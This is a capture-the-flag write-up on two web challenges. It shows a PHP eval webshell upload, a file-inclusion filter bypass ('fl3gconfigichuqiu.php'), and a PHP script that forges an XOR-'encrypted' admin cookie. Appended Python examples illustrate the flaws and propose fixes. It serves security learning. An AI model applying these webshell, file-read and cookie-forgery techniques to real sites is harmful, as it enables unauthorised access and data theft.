Upload
Files can be uploaded, and after uploading you can click the source link to open the file. I uploaded these lines:
@eval($POST["code"]);
?>
What I found was this:
<script language="PHP">
$f=fopen("../flag.".strtolower("PHP"),'r');
echo fread($f,filesize("../flag.".strtolower("PHP")));
fclose($f);
</script>
View the page source and click /u/x.php to get the flag.
Here is a link on the four PHP tag styles: https://blog.csdn.net/qq_35085863/article/details/76714367
code: a brain-teaser, can you get past it?
Opening the challenge shows an image: http://154dd661c59a463aacb5d7f969774e19a5144eb67aee4c93.changame.ichunqiu.com/index.php?jpg=hei.jpg
The URL suggests a file inclusion, so view index.php through it:
http://154dd661c59a463aacb5d7f969774e19a5144eb67aee4c93.changame.ichunqiu.com/index.php?jpg=index.php
Viewing the page source gives a base64 string:
<title>file:index.php</title><img src='data:image/gif;base64,PD9waHANCi8qKg0KICogQ3JlYXRlZCBieSBQaHBTdG9ybS4NCiAqIERhdGU6IDIwMTUvMTEvMTYNCiAqIFRpbWU6IDE6MzENCiAqLw0KaGVhZGVyKCdjb250ZW50LXR5cGU6dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTgnKTsNCmlmKCEgaXNzZXQoJF9HRVRbJ2pwZyddKSkNCiAgICBoZWFkZXIoJ1JlZnJlc2g6MDt1cmw9Li9pbmRleC5waHA/anBnPWhlaS5qcGcnKTsNCiRmaWxlID0gJF9HRVRbJ2pwZyddOw0KZWNobyAnPHRpdGxlPmZpbGU6Jy4kZmlsZS4nPC90aXRsZT4nOw0KJGZpbGUgPSBwcmVnX3JlcGxhY2UoIi9bXmEtekEtWjAtOS5dKy8iLCIiLCAkZmlsZSk7DQokZmlsZSA9IHN0cl9yZXBsYWNlKCJjb25maWciLCJfIiwgJGZpbGUpOw0KJHR4dCA9IGJhc2U2NF9lbmNvZGUoZmlsZV9nZXRfY29udGVudHMoJGZpbGUpKTsNCg0KZWNobyAiPGltZyBzcmM9J2RhdGE6aW1hZ2UvZ2lmO2Jhc2U2NCwiLiR0eHQuIic+PC9pbWc+IjsNCg0KLyoNCiAqIENhbiB5b3UgZmluZCB0aGUgZmxhZyBmaWxlPw0KICoNCiAqLw0KDQo/Pg=='></img>
Decoding it gives (the full decoded source of the base64 above, including the PhpStorm header comment and the HTML the script prints):
<?php
/** Created by PhpStorm. Date: 2015/11/16 Time: 1:31 */
header('content-type:text/html;charset=utf-8');
if(! isset($_GET['jpg']))
    header('Refresh:0;url=./index.php?jpg=hei.jpg');
$file = $_GET['jpg'];
echo '<title>file:'.$file.'</title>';
$file = preg_replace("/[^a-zA-Z0-9.]+/","", $file);
$file = str_replace("config","_", $file);
$txt = base64_encode(file_get_contents($file));
echo "<img src='data:image/gif;base64,".$txt."'></img>";
/* Can you find the flag file? */
?>
After reading a write-up: PhpStorm creates an .idea folder when a new project is set up, and it contains workspace.xml. Visiting http://154dd661c59a463aacb5d7f969774e19a5144eb67aee4c93.changame.ichunqiu.com/.idea/workspace.xml and viewing its source reveals something interesting:
<option value="$PROJECT_DIR$/x.php" />
<option value="$PROJECT_DIR$/config.php" />
<option value="$PROJECT_DIR$/fl3g_ichuqiu.php" />
So I tried opening fl3g_ichuqiu.php directly, which did not work ╮(╯▽╰)╭
index.php can still be used to read files (access index.php?jpg=fl3g_ichuqiu.php), but it is easy to see that every character outside letters, digits and '.' is filtered out, which means the _ is stripped. However, the word config is then replaced with _, and that lets us get around the filter. So the payload is:
/index.php?jpg=fl3gconfigichuqiu.php
That returns another base64 string; decoding it yields the source:
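As an added illustration (my own code, not the challenge's), here is a Python port of the two sanitizing steps from index.php, with the same two steps in the reverse order beside it, and a path-resolving check that refuses anything outside an image directory or without an image extension. The directory name, the extension allow-list and the temporary files built in demo() are constructed for the demo.

```python
import os
import re
import tempfile

# Added illustration, not the challenge's code. Names below are constructed.
IMAGE_DIR_NAME = "images"          # assumed directory the images are served from
ALLOWED_EXT = {".jpg", ".jpeg", ".gif", ".png"}


def challenge_filter(name: str) -> str:
    # Step 1 strips everything outside [a-zA-Z0-9.], which removes '_'.
    # Step 2 then turns the literal word "config" into '_'.
    # Because step 2 runs after step 1, it re-creates a character that
    # step 1 was supposed to remove: this is the ordering bug in index.php.
    name = re.sub(r"[^a-zA-Z0-9.]+", "", name)
    return name.replace("config", "_")


def safe_filter(name: str) -> str:
    # Same two steps in the opposite order: the replacement happens first,
    # so the strip step sees (and removes) any '_' it produced. No '_' can
    # survive this function.
    name = name.replace("config", "_")
    return re.sub(r"[^a-zA-Z0-9.]+", "", name)


def resolve_image(base_dir: str, requested: str):
    """Return the absolute path to serve, or None if the request must be refused.

    Rather than trying to sanitize the string, resolve the path and check two
    properties: the result stays inside base_dir, and its extension is on the
    allow-list. A ".php" source file is refused however its name was spelled.
    """
    base_real = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base_real, requested))
    if os.path.commonpath([base_real, target]) != base_real:
        return None                      # escaped the image directory
    if os.path.splitext(target)[1].lower() not in ALLOWED_EXT:
        return None                      # not an image
    return target


def demo():
    # constructed layout: <tmp>/images/hei.jpg and <tmp>/fl3g_ichuqiu.php
    root = tempfile.mkdtemp()
    img_dir = os.path.join(root, IMAGE_DIR_NAME)
    os.mkdir(img_dir)
    open(os.path.join(img_dir, "hei.jpg"), "wb").close()
    open(os.path.join(root, "fl3g_ichuqiu.php"), "w").close()
    return {
        "weak": challenge_filter("fl3gconfigichuqiu.php"),        # '_' comes back
        "reordered": safe_filter("fl3gconfigichuqiu.php"),         # no '_' survives
        "ok": resolve_image(img_dir, "hei.jpg"),
        "php_refused": resolve_image(img_dir, "fl3gconfigichuqiu.php"),
        "traversal_refused": resolve_image(img_dir, "../fl3g_ichuqiu.php"),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The reordered filter only closes this one hole; resolve_image is the check worth copying, because it does not depend on guessing which substrings a user might send.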
<?php
error_reporting(E_ALL || ~E_NOTICE);
include('config.php');
function random($length, $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz') {
    $hash = '';
    $max = strlen($chars) - 1;
    for($i = 0; $i < $length; $i++) {
        $hash .= $chars[mt_rand(0, $max)];
    }
    return $hash;
}
function encrypt($txt,$key){
    for($i=0;$i<strlen($txt);$i++){
        $tmp .= chr(ord($txt[$i])+10);
    }
    $txt = $tmp;
    $rnd=random(4);
    $key=md5($rnd.$key);
    $s=0;
    for($i=0;$i<strlen($txt);$i++){
        if($s == 32) $s = 0;
        $ttmp .= $txt[$i] ^ $key[++$s];
    }
    return base64_encode($rnd.$ttmp);
}
function decrypt($txt,$key){
    $txt=base64_decode($txt);
    $rnd = substr($txt,0,4);
    $txt = substr($txt,4);
    $key=md5($rnd.$key);
    $s=0;
    for($i=0;$i<strlen($txt);$i++){
        if($s == 32) $s = 0;
        $tmp .= $txt[$i]^$key[++$s];
    }
    for($i=0;$i<strlen($tmp);$i++){
        $tmp1 .= chr(ord($tmp[$i])-10);
    }
    return $tmp1;
}
$username = decrypt($_COOKIE['user'],$key);
if ($username == 'system'){
    echo $flag;
}else{
    setCOOKIE('user',encrypt('guest',$key));
    echo "╮(╯▽╰)╭";
}
?>
I read PureT's write-up: https://www.jianshu.com/p/3d7fb34c28a6
After analysis, the flag should be in config.php. fl3g_ichuqiu.php takes the cookie value, decrypts it, and prints the flag if the result equals system. What we have to do is study the encryption algorithm and work out how to make fl3g_ichuqiu.php decrypt the username in the cookie to system.
The starting point for breaking this scheme is that we already know the encrypted result of guest.
First intercept the request with Burp Suite to read the cookie, then run the script.
Respect to the author, who wrote the script in PHP; impressive~~
<?php
error_reporting(E_ALL || ~E_NOTICE);
$text = 'guest';
$COOKIE_guest = 'dk9FS0hOXUhH';
$COOKIE_guest = base64_decode($COOKIE_guest);
$rnd = substr($COOKIE_guest,0,4);
$COOKIE_guest = substr($COOKIE_guest,4);
// shift the known plaintext the same way encrypt() does
for ($i = 0; $i < strlen($text); $i++) {
    $text[$i] = chr(ord($text[$i])+10);
}
// XOR the shifted plaintext with the ciphertext to recover the keystream bytes
$key = '';
for ($i = 0; $i < strlen($text); $i++) {
    $key .= ($text[$i] ^ $COOKIE_guest[$i]);
}
$text2 = 'system';
for ($i = 0; $i < strlen($text2); $i++) {
    $text2[$i] = chr(ord($text2[$i])+10);
}
// the sixth keystream byte is one md5 hex digit, so all 16 candidates are listed
$t = '0123456789abcdef';
for ($j = 0; $j < strlen($t); $j++) {
    $key_temp = $key.$t[$j];
    $result = '';
    for ($i = 0; $i < strlen($text2); $i++) {
        $result .= ($key_temp[$i] ^ $text2[$i]);
    }
    $result = base64_encode($rnd.$result);
    echo $result."\n";
}
?>
The script already enumerates every case for the sixth character; running it prints:
dk9FS0SyT0tWRw==
dk9FS0SyT0tWRg==
dk9FS0SyT0tWRQ==
dk9FS0SyT0tWRA==
dk9FS0SyT0tWQw==
dk9FS0SyT0tWQg==
dk9FS0SyT0tWQQ==
dk9FS0SyT0tWQA==
dk9FS0SyT0tWTw==
dk9FS0SyT0tWTg==
dk9FS0SyT0tWFg==
dk9FS0SyT0tWFQ==
dk9FS0SyT0tWFA==
dk9FS0SyT0tWEw==
dk9FS0SyT0tWEg==
dk9FS0SyT0tWEQ==
guest is 5 characters while system is 6, so the last character still has to be brute-forced; load the values above into BP and brute-force them. That is how it should work in theory, but it just won't crack ┭┮﹏┭┮
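As an added example (my own code, not PureT's script and not the challenge's), the following Python port of encrypt()/decrypt() from fl3g_ichuqiu.php makes the weakness used by the analysis and the script above concrete: rnd travels in the cookie and the keystream is just md5(rnd.key), so whoever holds one known plaintext ('guest', which every visitor is handed) can read off the keystream bytes for those positions without knowing key. It also shows what the server should check instead: an HMAC over the cookie value, which fails on any edited value. SERVER_KEY is a constructed stand-in for the $key in config.php (which the challenge never reveals); the cookie value dk9FS0hOXUhH is the one quoted in the write-up.

```python
import base64
import hashlib
import hmac
import secrets

# Added example, not the challenge's code. SERVER_KEY stands in for the $key
# defined in config.php, which the challenge never reveals.
SERVER_KEY = b"constructed-demo-key"
ALPHABET = b"ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz"
HEX_DIGITS = b"0123456789abcdef"
# cookie value quoted in the write-up above (base64 of rnd + ciphertext of "guest")
PAGE_COOKIE = "dk9FS0hOXUhH"


def random_rnd(length=4):
    # port of random(): `length` picks from the 62-character alphabet
    # (secrets.choice instead of mt_rand; the distribution is the same)
    return bytes(secrets.choice(ALPHABET) for _ in range(length))


def shift10(data, direction):
    # encrypt() adds 10 to every byte before the XOR, decrypt() subtracts it
    # afterwards; PHP's chr() wraps modulo 256, so mask to a byte here too
    return bytes((b + 10 * direction) & 0xFF for b in data)


def keystream(rnd, key):
    # md5($rnd.$key) as 32 hex characters. The PHP loop reads $key[++$s], so
    # offset 0 is never used and the stream is offsets 1..31 (offset 32 is past
    # the end of the string in PHP, so this port stops at 31 bytes).
    return hashlib.md5(rnd + key).hexdigest().encode()[1:]


def xor_stream(data, rnd, key):
    ks = keystream(rnd, key)
    if len(data) > len(ks):
        raise ValueError("port covers values up to 31 bytes")
    return bytes(c ^ k for c, k in zip(data, ks))


def challenge_encrypt(txt, key, rnd=None):
    rnd = rnd or random_rnd()
    return base64.b64encode(rnd + xor_stream(shift10(txt, +1), rnd, key)).decode()


def challenge_decrypt(cookie, key):
    raw = base64.b64decode(cookie)
    return shift10(xor_stream(raw[4:], raw[:4], key), -1)


def leaked_keystream(cookie, known_plaintext):
    # The weakness: rnd is in the clear and "guest" is handed to everyone, so
    # ciphertext XOR shifted plaintext is the keystream for those positions.
    # SERVER_KEY is not involved at all.
    raw = base64.b64decode(cookie)
    rnd, body = raw[:4], raw[4:]
    return rnd, bytes(c ^ p for c, p in zip(body, shift10(known_plaintext, +1)))


# What the server should do instead: authenticate the value, not just mask it.
def sign_cookie(value, key):
    tag = hmac.new(key, value, hashlib.sha256).hexdigest()
    return base64.b64encode(value).decode() + "." + tag


def verify_cookie(cookie, key):
    # returns the value only when the tag matches; any edit to the value fails
    try:
        b64, tag = cookie.rsplit(".", 1)
        value = base64.b64decode(b64, validate=True)
    except ValueError:          # covers a missing '.' and binascii.Error
        return None
    expected = hmac.new(key, value, hashlib.sha256).hexdigest()
    return value if hmac.compare_digest(expected, tag) else None


if __name__ == "__main__":
    rnd, ks = leaked_keystream(PAGE_COOKIE, b"guest")
    print("rnd from the page's cookie:", rnd, "keystream bytes:", ks)
    print("round trip:", challenge_decrypt(challenge_encrypt(b"guest", SERVER_KEY), SERVER_KEY))
    print("signed guest cookie verifies as:", verify_cookie(sign_cookie(b"guest", SERVER_KEY), SERVER_KEY))
```

Running it on the page's cookie shows that the five recovered keystream bytes are all hex digits, which is exactly why the script above only has to try 16 candidates for the sixth byte. With the HMAC variant the server never decrypts anything: it recomputes the tag over the received value and compares in constant time, so swapping the value for another string, or guessing tag bytes one at a time, gets the client nothing.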